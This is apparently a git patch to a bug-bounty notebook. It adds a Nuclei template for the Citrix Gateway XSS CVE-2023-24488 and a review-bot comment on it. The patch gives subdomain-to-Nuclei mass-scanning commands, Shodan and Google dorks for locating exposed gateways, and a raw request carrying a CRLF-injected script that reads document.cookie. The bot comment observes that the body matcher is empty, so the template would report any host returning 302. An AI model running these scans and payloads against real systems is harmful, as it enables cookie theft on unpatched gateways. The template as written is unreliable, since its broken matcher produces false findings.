From aedb40ca279636a3c83c4e279283a6ae4cb1d73b Mon Sep 17 00:00:00 2001
From: Xalgord
Date: Tue, 25 Jul 2023 11:16:45 +0000
Subject: [PATCH] GITBOOK-51: change request with no subject merged in GitBook
---
 README.md | 15 ++++++++
 SUMMARY.md | 1 +
 xss-nuclei-template-cve-2023-24488.yaml.md | 45 ++++++++++++++++++++++
 3 files changed, 61 insertions(+)
 create mode 100644 xss-nuclei-template-cve-2023-24488.yaml.md
diff --git a/README.md b/README.md
index 776487e..435e121 100644
--- a/README.md
+++ b/README.md
@@ -359,6 +359,21 @@ GET /?q=xss
 POST /q=xss
 ```
+### Nuclei CVE-2023-24488 Citrix XSS - Easy Bug Bounty
+
+**Command**:\
+subfinder -d [target.com](http://target.com/) -silent | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
+\
+assetfinder [target.com](http://target.com/) | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
+\
+**Template**: [xss-nuclei-template-cve-2023-24488.yaml.md](xss-nuclei-template-cve-2023-24488.yaml.md "mention")\
+\
+**Shodan Dork**:\
+ssl:[target.com](http://target.com/) title:"Citrix gateway"\
+\
+**Dork**:\
+intitle:"Citrix Gateway" -site:[citrix.com](http://citrix.com/)
+
 ### Some awesome people on twitter
 * [@Dark\_Knight](https://twitter.com/\_Dark\_Knight\_)
diff --git a/SUMMARY.md b/SUMMARY.md
index b95f126..b0a632f 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -13,3 +13,4 @@
 * [🔎 How I hacked NASA and got 8 bugs ?](recon-strategies-by-other-hackers/how-i-hacked-nasa-and-got-8-bugs.md)
 * [🔎 Simple Recon Methodology](recon-strategies-by-other-hackers/simple-recon-methodology.md)
 * [🌀 Possible "Content-Type" Header values](possible-content-type-header-values.md)
+* [🎯 XSS nuclei template CVE-2023-24488.yaml](xss-nuclei-template-cve-2023-24488.yaml.md)
diff --git a/xss-nuclei-template-cve-2023-24488.yaml.md b/xss-nuclei-template-cve-2023-24488.yaml.md
new file mode 100644
index 0000000..dc28322
--- /dev/null
+++ b/xss-nuclei-template-cve-2023-24488.yaml.md
@@ -0,0 +1,45 @@
+# 🎯 XSS nuclei template CVE-2023-24488.yaml
+
+```yaml
+id: CVE-2023-24488
+
+info:
+ name: CVE-2023-24488
+ author: assetnote
+ severity: medium
+ description: description
+ reference:
+ - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
+ tags: tags
+
+requests:
+ - raw:
+ - |+
+ GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+ Cookie: NSC_TASS=/Citrix
+ Cache-Control: max-age=0
+ Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Brave";v="114"
+ Sec-Ch-Ua-Mobile: ?0
+ Sec-Ch-Ua-Platform: "Windows"
+ Upgrade-Insecure-Requests: 1
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
+ Sec-Gpc: 1
+ Accept-Language: en-GB,en
+ Sec-Fetch-Site: none
+ Sec-Fetch-Mode: navigate
+ Sec-Fetch-User: ?1
+ Sec-Fetch-Dest: document
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ -
+ - type: status
+ status:
+ - 302
+```
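Review bot: The `words:` list of the body matcher near the end of the template holds a single empty entry (`-` with no value), so the body check constrains nothing and, under `matchers-condition: and`, the template would presumably report every host that answers this path with a 302, patched or not. The value may have been lost when the page was rendered, but as committed the list needs the marker the request line injects, e.g. `- "<script>alert(document.cookie)</script>"`. A second `type: word` matcher with `part: header` on `text/html` would also keep a reflected-but-inert response from being counted as a finding. `description: description` and `tags: tags` are unfilled placeholders; a one-line description of the issue and real tags (for example `cve,cve2023,citrix,xss`) would make results filterable and triageable.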